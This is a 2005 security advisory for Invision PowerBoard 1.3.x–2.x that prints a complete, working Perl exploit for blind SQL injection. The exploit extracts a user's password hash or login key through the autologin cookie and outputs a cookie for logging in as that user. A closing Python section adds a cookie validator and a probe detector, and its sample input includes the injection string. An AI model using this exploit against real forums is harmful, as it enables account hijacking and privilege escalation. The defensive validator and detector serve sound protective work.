[HSC Security Group] Invision PowerBoard 1.3.x - 2.x Exploit and Patch

2005-07-17T00:00:00
ID SECURITYVULNS:DOC:9206
Type securityvulns
Reporter Securityvulns
Modified 2005-07-17T00:00:00

Description

Hackers Center Security Group (http://www.hackerscenter.com/) Zinho's Security Advisory

Desc: Invision PowerBoard 1.3.x - 2.x Privilege escalation through SQL injection
Risk: High

h4cky0u from http://www.h4cky0u.org kindly reported to me an exploit working against 1.3.x and 2.x versions of Invision Power Board.

I've coded a quickfix to patch it: http://www.hackerscenter.com/archive/view.asp?id=3812

This is the exploit (Full credit to h4cky0u for it):

#!/usr/bin/perl -w
#
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
#
# Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1];   # userid to jack
my $iver = $ARGV[2];   # version 1 or 2
my $cpre = $ARGV[3];   # cookie prefix
my $dbug = $ARGV[4];   # debug?

if (!$ARGV[2]) {
    print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2]. ";
    exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ ) {
    for( $j=0; $j < 16; $j++ ) {
        my $current = $charset[$j];
        my $sql = ( $iver < 2 )
            ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*"
            : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
        my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
        my $res = $ua->get($path, @cookie);

        # If we get a valid sql request then this
        # does not appear anywhere in the sources
        $pattern = '<title>(.*)Log In(.*)</title>';
        $_ = $res->content;

        if ($dbug) { print };

        if ( !(/$pattern/) ) { $outputs .= $current; print "$current "; last; }
    }
    if ( length($outputs) < 1 ) { print "Not Exploitable! "; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;

# www.h4cky0u.org
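The root cause is that the autologin handler passes the pass_hash cookie into SQL without checking that it is a 32-character hex digest, which is what lets the MID() probe above walk the hash one character at a time. The following Python is an added defensive example, not the advisory's quickfix (only linked above) and not Invision code: it shows the allow-list check a patched handler should apply to the two cookie fields, plus a scanner that flags Cookie headers carrying the published probe. Function names and the sample cookies are constructed.

```python
import re
from urllib.parse import unquote

# A real IPB autologin cookie carries a numeric member_id and an MD5-style
# lowercase hex digest in pass_hash. Anything else should never reach a query.
HASH_RE = re.compile(r"^[0-9a-f]{32}$")
ID_RE = re.compile(r"^[0-9]+$")

# Signature of the published probe: boolean OR plus MID() over the hash column.
PROBE_RE = re.compile(r"\bOR\b.*\bMID\((password|member_login_key)\s*,", re.I)


def valid_autologin(member_id: str, pass_hash: str) -> bool:
    """Strict allow-list a hardened login handler applies before any SQL is
    built (hypothetical hardening, not the vendor's code)."""
    return bool(ID_RE.match(member_id) and HASH_RE.match(pass_hash))


def decode_twice(value: str) -> str:
    # The exploit sends %2527: the first decode yields %27, the second yields '.
    return unquote(unquote(value))


def flag_cookie(cookie_header: str, prefix: str = "") -> list:
    """Return (cookie_name, reason) for autologin fields that are not well formed.
    reason is 'probe' when the decoded value matches the MID() injection,
    otherwise 'malformed'. prefix is the installation's cookie prefix."""
    hits = []
    for part in cookie_header.split(";"):
        if "=" not in part:
            continue
        name, value = part.strip().split("=", 1)
        decoded = decode_twice(value)
        if name == prefix + "pass_hash" and not HASH_RE.match(decoded):
            hits.append((name, "probe" if PROBE_RE.search(decoded) else "malformed"))
        elif name == prefix + "member_id" and not ID_RE.match(decoded):
            hits.append((name, "malformed"))
    return hits


# Constructed samples: one legitimate autologin cookie, one exploit probe.
SAMPLE_COOKIES = [
    "member_id=42; pass_hash=5d41402abc4b2a76b9719d911017c592",
    "member_id=31337420; pass_hash=99%2527+OR+(id%3d1+AND+MID(password,1,1)%3d%2527a%2527)/*",
]

if __name__ == "__main__":
    for cookie in SAMPLE_COOKIES:
        print(cookie[:40], "->", flag_cookie(cookie) or "clean")
```

The same two regexes can be dropped into a WAF or log-pipeline rule: a pass_hash that is not exactly 32 hex characters is never a legitimate autologin attempt.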